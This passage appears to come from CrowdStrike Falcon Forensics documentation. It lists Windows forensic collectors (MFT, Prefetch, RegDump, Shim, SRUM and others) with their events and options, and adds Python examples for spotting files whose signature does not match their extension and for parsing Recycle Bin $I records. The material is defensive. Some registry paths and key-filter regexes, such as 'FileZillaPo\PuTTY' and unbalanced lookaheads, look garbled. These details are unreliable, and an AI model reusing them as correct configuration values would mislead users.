Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. Yes: 15
Disable Symbolic Links Boolean Prevents following symbolic links during collection. Yes
Short Name Boolean Use short filename version of file extension. No
Max Count Integer Don't report if file signature count is less than max. No: collector default is 32
Include Unknown Boolean Include unknown and unrecognized signatures. No
Only PE Boolean Only process Portable Executable (PE) files. Yes
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes: 20MB
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
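
To show what a signature mismatch check of the kind the Magic collector performs looks like, here is an added Python example (not CrowdStrike code). It recognises a few header signatures (PE via the MZ header and the PE\0\0 signature it points to, ZIP, PDF, PNG), compares them with the file extension, honours the Only PE, Include Unknown and Skip Hashing Above Size options as the table describes them, and parses the B/KB/MB/GB size strings; the signature table, the option semantics and the constructed sample files are assumptions.

```python
"""Extension-vs-magic mismatch scan in the spirit of the Magic collector
(added example, not CrowdStrike code). The signature table, the Only PE /
Include Unknown handling and the size-string parser follow the options in the
table above; the exact rules the collector applies are not on the page."""
import hashlib
import struct
import tempfile
from pathlib import Path
from typing import Optional

# Extensions we expect for each header signature we recognise (our table, not the collector's).
EXPECTED_EXTENSIONS = {
    "PE":  {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi"},
    "MZ":  {".exe", ".com"},                      # DOS executable without a PE header
    "ZIP": {".zip", ".jar", ".apk", ".docx", ".xlsx", ".pptx"},
    "PDF": {".pdf"},
    "PNG": {".png"},
}


def parse_size(text: str) -> int:
    """Parse the Skip Hashing size strings: '5MB', '512KB', '100B', '1GB'; a bare number means MB."""
    t = text.strip().upper()
    units = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
    for suffix in ("KB", "MB", "GB", "B"):      # two-letter suffixes first, so '5MB' is not read as bytes
        if t.endswith(suffix):
            return int(float(t[: -len(suffix)])) * units[suffix]
    return int(float(t)) * units["MB"]


def identify(header: bytes) -> Optional[str]:
    """Classify the leading bytes of a file; None when no known signature matches."""
    if header[:2] == b"MZ":
        if len(header) >= 0x40:
            # e_lfanew at offset 0x3C gives the offset of the "PE\0\0" signature.
            e_lfanew = struct.unpack_from("<I", header, 0x3C)[0]
            if header[e_lfanew:e_lfanew + 4] == b"PE\0\0":
                return "PE"
        return "MZ"
    if header[:4] == b"PK\x03\x04":
        return "ZIP"
    if header[:5] == b"%PDF-":
        return "PDF"
    if header[:8] == b"\x89PNG\r\n\x1a\n":
        return "PNG"
    return None


def scan(root: Path, only_pe: bool = True, include_unknown: bool = False,
         skip_hashing_above: str = "20MB") -> list:
    """Report files whose extension is not one we expect for their signature."""
    hash_limit = parse_size(skip_hashing_above)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        with open(path, "rb") as fh:
            header = fh.read(4096)
        sig = identify(header)
        ext = path.suffix.lower()
        if sig is None:
            if not include_unknown:            # "Include Unknown" off: skip unrecognised signatures
                continue
        elif only_pe and sig != "PE":          # "Only PE" on: ignore every other recognised signature
            continue
        elif ext in EXPECTED_EXTENSIONS[sig]:  # extension agrees with the header: nothing to report
            continue
        size = path.stat().st_size
        findings.append({
            "path": str(path), "signature": sig, "extension": ext, "size": size,
            # "Skip Hashing Above Size": hash only files at or below the limit
            "sha256": hashlib.sha256(path.read_bytes()).hexdigest() if size <= hash_limit else None,
        })
    return findings


def minimal_pe_bytes() -> bytes:
    """Construct the smallest byte string identify() accepts as a PE image (constructed data)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> immediately after the DOS header
    return bytes(dos) + b"PE\0\0" + b"\x64\x86" + b"\0" * 18   # Machine = x64, rest of COFF header zeroed


def demo(**scan_options) -> list:
    """Write constructed sample files to a fresh temp directory and scan it."""
    root = Path(tempfile.mkdtemp(prefix="magic_demo_"))
    (root / "tool.exe").write_bytes(minimal_pe_bytes())             # PE with a PE extension: fine
    (root / "invoice.doiuv").write_bytes(minimal_pe_bytes())        # PE hiding behind an odd extension
    (root / "archive.exe").write_bytes(b"PK\x03\x04" + b"\0" * 26)  # ZIP named like an executable
    (root / "notes.txt").write_bytes(b"just text")                  # no recognised signature
    return scan(root, **scan_options)


if __name__ == "__main__":
    for finding in demo(only_pe=False, include_unknown=True):
        print(finding)
```

With the defaults from the table (Only PE on, Include Unknown off) only invoice.doiuv is reported; turning Only PE off also surfaces the ZIP archive carrying an .exe extension, and Include Unknown adds the text file that has no signature at all.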
Mal

Collects malicious evidence related to Sticky Keys and DLL Hijacking.

Events generated

MalPaths: Malicious DLL or executable image name conflicts found in different or unexpected folders.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Yes: %SystemDrive%
Actions String Specific actions to scan for. Yes: dllsvchost, dllinpath, sticky, masquerade
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. Yes: 15

MFT

Collects data from deleted file records from the Windows Master File Table (MFT).

Events generated

MftBootSector: Windows Master File Table (MFT) Boot sector.

MftRecord: Windows Master File Table (MFT) record.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Yes: %SystemDrive%
Scan All Drives Boolean Enables scanning of all available drives. No
Before Days Integer Number of days to look back for file records. Yes: 365
Find Deleted Files Boolean Include deleted file records in collection. Yes
Find In-Use Files Boolean Include currently active file records in collection. No
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. No: collector defaults to *.*
Maximum Entries Integer Maximum number of entries to collect. No: collector defaults to unlimited
Start Record Integer Start at <number> MFT record. No
Display MAC Times Boolean Show Modified, Accessed, and Created timestamps. Yes
Exclude Zero Size Files Boolean Skip files with a byte size of zero. No
Network

Collect comprehensive network configuration and connection information including interfaces, DNS, routing, and active connections.

Events generated

IPv4:

  • LocalIpAddressIP4: IPv4 Address on the machine.
  • NetworkListenIP4: IPv4 Network listen event.
  • NetworkCloseIP4: IPv4 network close event.
  • NetworkConnectIP4: IPv4 network connect event.
  • NetworkReceiveAcceptIP4: IPv4 network SYN event.
  • NetworkStatisticsIP4: Running IPv4 protocol statistics on a host.
  • NetworkStatisticsTCP4: Running TCP/IPv4 protocol statistics on a host.
  • NetworkStatisticsUDP4: Running UDP/IPv4 protocol statistics on a host.
  • RouteIP4: IPv4 Route entry.

IPv6:

  • LocalIpAddressIP6: IPv6 Address on the machine.
  • NetworkCloseIP6: IPv6 network close event.
  • NetworkConnectIP6: IPv6 network connect event.
  • NetworkListenIP6: IPv6 Network listen event.
  • NetworkReceiveAcceptIP6: IPv6 network SYN event.
  • NetworkStatisticsIP6: Running IPv6 protocol statistics on a host.
  • NetworkStatisticsTCP6: Running TCP/IPv6 protocol statistics on a host.
  • NetworkStatisticsUDP6: Running UDP/IPv6 protocol statistics on a host.
  • RouteIP6: IPv6 Route entry.

DNS:

  • DnsCache: DNS cache entry.
  • DnsServer: DNS server IP addresses.
  • NetworkDnsSuffix: A network suffix name in the configured DNS suffix list.

ARP:

  • NeighborListIP4: An entry in the ARP table.
  • NeighborListIP6: An entry in the ARP table.

Hosts file:

  • NetworkHostsFileEntry: A hostname entry in the network hosts file.
PCA

Collects data from the Windows 11 Pro (22H2) Program Compatibility Assistant (PCA) artifacts.

Events generated

PcaAppLaunchEntry: An application launch entry in the Windows Program Compatibility Assistant (PCA) file PcaAppLaunchDic.txt.

PcaGeneralDbEntry: An application launch entry in Windows Program Compatibility Assistant (PCA) database PcaGeneralDb[0-9]+.txt.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Yes: %SystemRoot%\appcompat\pca
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. Yes: Pca*.txt
Line Inclusion Regex String Regular expression pattern for filtering log lines. No
Maximum Entries Integer Maximum number of entries to collect. Default: unlimited. No
Process Last Lines Integer Only process the last specified number of lines of each log file. No
First Lines Integer Number of lines to collect from the beginning of each file. No
File Operations Multiple selection The file operations to include in this collection. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
PEInfo

Collects Portable Executable (PE) header information and file metadata. The default configuration has two PEInfo collectors: one for .exe files and one for running processes.

Events generated

PeHeaderInfo: Portable Executable header information from a Windows executable.

PeHeaderOptionalInfo: Portable Executable optional header information from a Windows executable.

PeSectionInfo: Windows Portable Executable (PE) section information.

Configurable options
Option Type Description In default configuration?
PE Source Selection Must select Analyze Running Processes or Path. No
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Perform Anomaly Detection Boolean Detect anomalies in PE files. No
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. Yes for exe collector: *.exe. The running collector sets no mask and uses the default *.*
Don't dump function names Boolean When obtaining PE file information, don't dump function names for imports and exports. Yes for exe collector
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. Yes for exe collector: 15
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Recursive Listing Boolean Enables recursive directory scanning. Yes for exe collector
Don't dump resource information Boolean When obtaining PE file information, don't dump full resource information. Yes for exe collector
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Help Tag String Help tag that describes the event filter. Yes for running collector: running
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
Pipes

Collect information about named pipes currently active on the system including names and attributes.

Events generated

NamedPipe: Information about a named pipe.

Prefetch

Collects metadata from .pf and Layout.ini files.

Events generated

PrefetchFile: A Prefetch or Layout file record; holds the 8 most recent execution times of a Windows application.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No: collector defaults to %SystemRoot%\Prefetch
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. No: collector defaults to *.pf
Recursive Listing Boolean Enables recursive directory scanning. No
Translate Paths Boolean Translate \\dev\\harddiskvolume paths to logical drive path. Yes
PSList

Collects metadata from running processes.

Events generated

ProcessRollup2: Returns information about a running process. UserName is the owner of the process.

Configurable options
Option Type Description In default configuration?
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse, mft, indx
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. No: collector defaults to *.*
Obtain process command line Boolean Obtain the command line arguments used to start each process. Yes
Enumerate loaded modules Boolean List all modules (DLLs) loaded by each process. No
Detect orphan parent processes Boolean Look for process parent IDs that are not in the list of processes, which may indicate hidden processes. Yes
Process svchost DLLs Boolean Process and display svchost DLL entries. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes: 20MB
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
RecentFiles

Collects full file paths extracted from the Windows RecentFileCache.bcf file.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse, mft, indx
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes: 20MB
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Recycle

Collects file name and metadata of deleted files in the recycle bin.

Events generated

FileDeleted: File entry and details in the Recycle Bin.

Configurable options
Option Type Description In default configuration?
Path String Environment and app variables are automatically expanded. Default: '%SystemDrive%\$Recycle.Bin' Yes
Include Filter String Regular expression pattern for including paths. No
Exclude Filter String Regular expression pattern for excluding paths. No
File Mask String Specify which files to include in the collection, using wildcards. Default: $I*.* Yes
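
The FileDeleted event comes from the $I metadata records that Windows writes beside each recycled file (the matching $R file holds the content). The following Python is an added example, not CrowdStrike code: it decodes version 1 and version 2 $I records and walks a $Recycle.Bin tree with the collector's default $I*.* mask; the SID folder and the records it writes are constructed.

```python
"""Decode Recycle Bin $I records as the Recycle collector's FileDeleted event
would surface them (added example, not CrowdStrike code). The $I layout is the
Windows format; the records written by demo() are constructed."""
import struct
import tempfile
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from pathlib import Path

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


@dataclass
class FileDeleted:
    version: int
    original_size: int
    deleted_at: datetime
    original_path: str


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, using integer arithmetic to avoid float rounding."""
    delta = dt - FILETIME_EPOCH
    return ((delta.days * 86400 + delta.seconds) * 1_000_000 + delta.microseconds) * 10


def parse_dollar_i(data: bytes) -> FileDeleted:
    """Version 1 (Vista to 8.1): 8-byte version, original size, FILETIME, then a fixed
    520-byte UTF-16LE path. Version 2 (Windows 10+): same header, then a 4-byte
    character count and a variable-length UTF-16LE path."""
    if len(data) < 24:
        raise ValueError("truncated $I header")
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw = data[24:24 + 520]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw = data[28:28 + nchars * 2]
        if len(raw) != nchars * 2:
            raise ValueError("path length runs past the end of the record")
    else:
        raise ValueError(f"unsupported $I version {version}")
    path = raw.decode("utf-16-le").split("\0", 1)[0]
    return FileDeleted(version, size, filetime_to_datetime(ft), path)


def build_dollar_i(path: str, size: int, deleted_at: datetime, version: int = 2) -> bytes:
    """Produce a $I record; used only to construct sample input for the demo."""
    ft = datetime_to_filetime(deleted_at)
    encoded = (path + "\0").encode("utf-16-le")
    if version == 1:
        return struct.pack("<QQQ", 1, size, ft) + encoded.ljust(520, b"\0")
    return struct.pack("<QQQI", 2, size, ft, len(path) + 1) + encoded


def scan_recycle_bin(root: Path) -> list:
    """Walk <root>\\<user SID>\\$I* (the collector's default mask is $I*.*) and decode each record."""
    results = []
    for i_file in sorted(root.glob("*/$I*")):
        rec = parse_dollar_i(i_file.read_bytes())
        results.append({
            "sid": i_file.parent.name,
            "i_file": i_file.name,
            "r_file": "$R" + i_file.name[2:],   # companion file that still holds the content
            "original_path": rec.original_path,
            "original_size": rec.original_size,
            "deleted_at": rec.deleted_at.isoformat(),
        })
    return results


def demo() -> list:
    """Create a constructed $Recycle.Bin tree in a temp directory and scan it."""
    root = Path(tempfile.mkdtemp(prefix="recycle_demo_")) / "$Recycle.Bin"
    user = root / "S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed SID
    user.mkdir(parents=True)
    (user / "$IAB12CD.xlsx").write_bytes(build_dollar_i(
        "C:\\Users\\alice\\Documents\\payroll.xlsx", 48213,
        datetime(2024, 3, 5, 14, 7, 22, tzinfo=timezone.utc)))
    (user / "$IEF34GH.txt").write_bytes(build_dollar_i(
        "C:\\Users\\alice\\Desktop\\notes.txt", 1024,
        datetime(2023, 11, 30, 8, 0, 0, tzinfo=timezone.utc), version=1))
    return scan_recycle_bin(root)


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

The per-SID folder name tells you which user emptied the file into the bin, the $I record gives the original path, size and deletion time, and the $R name is the file to hash or acquire if the content is still needed.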
RegDump

Collects metadata from registry hives. The default configuration has multiple RegDump collectors; the Default configuration examples below list the default collectors and the registry keys each one gathers. All collections have an 8 kilobyte maximum limit.

Events generated

RegGenericInfo: Generic information about a registry entry.

Configurable options
Option Type Description In default configuration?
Registry key String Specify a registry key path to start dump from. Supports short-hand versions like 'hklm', 'hkcu'. No
Key Date Date Only process entries with write time on or after date. No
Output FILETIME Timestamp Boolean Output additional FILETIME timestamp version of binary data. No
Key Days Integer Only process entries with write time within the last n days. No
Hive File String Process raw registry hive file directly, input path to hive file. No
Process Files Modified Within Days Integer Only process offline registry files modified within the specified number of days. No
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Disable Symbolic Links Boolean Disable following directory symbolic links. No
Recursive Listing Boolean Enable recursive directory traversal. No
Help Tag String Help tag that describes the event filter. No
Ignore Empty Boolean Don't output details of empty keys. No
Key Name Filter String Regular expression to filter registry key names. No
Max Bytes String The max byte count for REG_BINARY. Yes: 8KB
Value Name Filter String Regular expression to filter registry value names. No
Wide Text Boolean Output additional wide character text version of binary data. No
Process Offline NTUSER.DAT Files Boolean Process offline NTUSER.DAT files for all users. No
Remote Boolean Connect to remote registry. No
ASCII Text Boolean Output additional ASCII text version of binary data. No
Data Filter String Value data (REG_SZ) regular expression. No
ROT13 Boolean Decode value names using ROT13 for REG_BINARY types. No
Value Types String List of data value types to process. This is a dropdown selection. No
Default configuration examples

All configurations include the following.

  • ASCII Text

  • Max Bytes: 8KB

  • Recursive Listing

  • Wide Text

HKLM registry keys

  • HKLM\SOFTWARE\Microsoft

    • Key filter:
      ^SOFTWARE\Microsoft\Windows( NT)(?!CurrentVersion\SideBySide|CurrentVersion\Component Based Servicing|CurrentVersion\Installer|CurrentVersion\Appmodel|CurrentVersion\Winevt|CurrentVersion\Perflib)
  • HKLM\SOFTWARE\Wow6432Node\Microsoft

    • Key filter:
      ^SOFTWARE\Wow6432Node\Microsoft\Windows( NT)(?!CurrentVersion\SideBySide|CurrentVersion\Component Based Servicing|CurrentVersion\Installer|CurrentVersion\Appmodel|CurrentVersion\Winevt|CurrentVersion\Perflib)
  • HKLM\SOFTWARE\Classes\Local Settings\Software\Microsoft

  • HKLM\SECURITY\Policy

  • HKLM\SYSTEM\CurrentControlSet\Control

    • Key filter:
      ^SYSTEM\CurrentControlSet\Control(?!WMI|Class|Notifications|NetDiagFX|Power).*
  • HKLM\SYSTEM\CurrentControlSet\Services

  • HKLM\SOFTWARE\Microsoft\Windows\currentversion\run

  • HKLM\SOFTWARE\Microsoft\Windows\currentversion\runonce

HKAU registry keys - Microsoft related

All HKAU configurations include Process Offline NTUSER.DAT Files.

  • HKAU\SOFTWARE\Microsoft

  • HKAU\SOFTWARE\Classes\Local Settings\Software\Microsoft

  • HKAU\SOFTWARE\Wow6432Node\Microsoft

  • HKAU\Software\AppDataLow\Software\Microsoft

  • HKAU\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

HKAU registry keys - Browser related

  • HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs

  • HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsTime

  • HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsVisitCount

HKAU registry keys - File management tools

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Bookmarks

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\CDCache

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Interface\Explorer

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\LastFingerprints

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\LifetimeCounters

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\PeriodCounters

  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\SshHostKeys

  • HKAU\Software\FileZillaPo\PuTTY\SshHostKeys

  • HKAU\Software\SimonTatham\PuTTY

  • HKAU\Software\7-Zip

  • HKAU\Software\Wow6432Node\7-Zip

  • HKAU\Software\Nico Mak Computing\WinZip

  • HKAU\SOFTWARE\WinRAR\DialogEditHistory

  • HKAU\Software\WinRAR\ArcHistory

HKAU registry keys - System management

  • HKAU\SOFTWARE\LANDesk\Inventory\LogonHistory\Logons

  • HKAU\SOFTWARE\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog

  • HKAU\SOFTWARE\Wow6432Node\LANDesk\Inventory\LogonHistory\Logons

  • HKAU\SOFTWARE\Wow6432Node\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog

  • HKAU\Software\ATERA Networks\AlphaAgent\

  • HKAU\SOFTWARE\Sysinternals

HKAU registry keys - Shell extensions

  • HKAU\SOFTWARE\Classes*\shellex
RegFile

Collects metadata from references to files in registry strings. The default configuration applies several RegFile collectors; because they share the same settings apart from the registry key and key filter, the "In default configuration?" column below is filled in only for File Operations.

Events generated

RegGenericInfo: Generic information about a registry entry.

Configurable options
Option Type Description In default configuration?
Registry key String Specify a registry key path to start dump from. Supports short-hand versions like 'hklm', 'hkcu'. No
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Key Name Filter String Regular expression pattern for filtering key names. No
Value Name Filter String Regular expression pattern for filtering value names. No
Process Files Modified Within Days Integer Only process offline registry files modified within the specified number of days. No
Recursive Listing Boolean Enables recursive directory scanning. No
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Process Offline NTUSER.DAT Files Boolean Process offline NTUSER.DAT files for all users. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Default configuration examples

Unless otherwise specified, all configurations include the following.

  • File Operations: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

  • Recursive listing

  • Skip Hashing Above Size: 20MB

HKLM registry keys

Registry key Key filter
HKLM\SOFTWARE\Microsoft
^SOFTWARE\Microsoft\Windows( NT)*\(?!CurrentVersion\SideBySide
HKLM\SOFTWARE\Wow6432Node\Microsoft
^SOFTWARE\Wow6432Node\Microsoft\Windows( NT)*\(?!CurrentVersion\SideBySide
HKLM\Software\Classes\Local Settings\Software\Microsoft none

HKAU registry keys

Registry key Key filter
HKAU\SOFTWARE\Microsoft
^SOFTWARE\Microsoft\Windows( NT)*
HKAU\SOFTWARE\Wow6432Node\Microsoft
^SOFTWARE\Wow6432Node\Microsoft\Windows( NT)*
HKAU\Software\Classes\Local Settings\Software\Microsoft none
SDB

Collects metadata from Application Compatibility Shim Database (SDB) files.

Events generated

ShimDbTag: Tag entry in the Shim Database.

Configurable options
Option Type Description In default configuration?
SDB Path String Parse single shim database file directly. No registry searching. Environment and app variables are automatically expanded. No
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

Services

Collects metadata from running services.

Events generated

ServicesStatusInfo: Detailed information and status of a Windows service.

Configurable options
Option Type Description In default configuration?
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Service Name Mask String Only process services matching wildcard mask. No
Process svchost DLLs Boolean Process and display svchost DLL entries. Yes
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes: 20MB
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Shares

Collect information about Windows network shares including share names, types, paths, and permissions.

Events generated

NetShareInfo: Information about a shared resource.

ShellBag

Collects metadata from Registry Shell Bags.

Events generated

ShellBagInfo: Windows ShellBag MRU registry entry.

ShellBagFileTimestampMetadata: An event is emitted per timestamp from a ShellBag registry entry.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No
Process Files Modified Within Days Integer Only process offline registry files modified within the specified number of days. No
Process Offline Registry Files Boolean Enable processing of offline registry files. Yes
Do Not Process Live Registry Boolean Only process offline registry files, not live registry files. No
Shim

Collects Application Compatibility (Shim) Cache metadata.

Events generated

RegShimCache: Shim cache registry entry.

Configurable options
Option Type Description In default configuration?
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes: 20MB
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Flush AppCompatCache Boolean Flush (clear from registry) AppCompatCache upon completion. No
SRUM

Collects System Resource Usage Management (SRUM) database parser metadata.

Events generated

SruApplicationResourceUsage: System Resource Utilization Monitor: application resource usage per user.

SruNetworkDataUsage: System Resource Utilization Monitor: bytes sent/received per local network interface, application and user tuple.

SruApplicationTimelineProvider: System Resource Utilization Monitor: application resource usage timeline.

SruNetworkConnectivityUsage: System Resource Utilization Monitor: connection time per local network interface, application, and user tuple.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No: collector defaults to %SystemRoot%\System32\sru
File Operations Multiple selection The file operations to include in this collection. No
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. No: collector defaults to SRUDB.dat
Use Full Row Mode Boolean Use full row mode rather than generic column/name/value mode. Yes
Exclude Empty Values Boolean Exclude empty values to reduce output size. Yes
Tables To Process Multiple selection Select which tables to process from the SRUM database. No
StartupInfo

Collects Microsoft Windows StartupInfo XML files metadata.

Events generated

AutoRunProcessInfo: Describes a process that was automatically executed.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No
Artifact File Operations Multiple selection File operations for artifact XML file. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Process File Operations Multiple selection File operations for process entry executable. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

SuperFetch

Collects metadata from the AgAppLaunch SuperFetch database file.

Events generated

SuperfetchAppInfo: Application entry from Windows Superfetch AgForegroundAppHistory.db.

SuperfetchAppSchedule: Application running schedule/period recently updated from Windows Superfetch AgGlobalHistory.db.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No
Treat Files As 32-bit OS Boolean Treat files as if they came from a 32-bit operating system. No
Treat Files As 64-bit OS Boolean Treat files as if they came from a 64-bit operating system. No
Recursive Listing Boolean Enable recursive directory traversal. No
Translate Paths Boolean Translate \\dev\\harddiskvolume paths to logical drive path. Yes
Syscache

Collects metadata from Syscache.hve.

Events generated

SyscacheEntry: Information about an entry in the Windows Syscache hive.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Yes
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Tasks

Collect information about Windows scheduled tasks including execution details, triggers, and configuration settings.

Events generated

ScheduledTaskInfo: Scheduled Windows tasks.

Timeline

Collects Windows 10 Timeline activity history including timestamps, executables, and file access records from ActivitiesCache.db.

Events generated

WindowsTimelineEntry: An entry in the ActivitiesCache.db.

WindowsTimelineEntryTimestamp: Timestamps for the entries in WindowsTimelineEntry.

Configurable options
Option Type Description In default configuration?
Ascending order Boolean Sort results chronologically. Default: descending. No
Copy database Boolean Make a temporary copy if the database is in use. Yes
After Date Date Report events generated on or after this UTC date. No
Maximum Entries Integer Maximum number of entries to collect. Yes: 1000
Days to include Integer Only collect records generated within the specified number of recent days. No
UAL

Collects metadata from the "CLIENTS" table of the User Access Logging (UAL) Extensible Storage Engine (ESE) or JET database on server systems.

Events generated

UserAccessLogEntry: Per-user access log information for the year for a service role and IP address pair on Windows servers.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No: collector defaults to %SystemRoot%\System32\LogFiles\sum
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. No: collector defaults to *.mdb
Use Full Row Mode Boolean Use full row mode rather than generic column/name/value mode. Yes
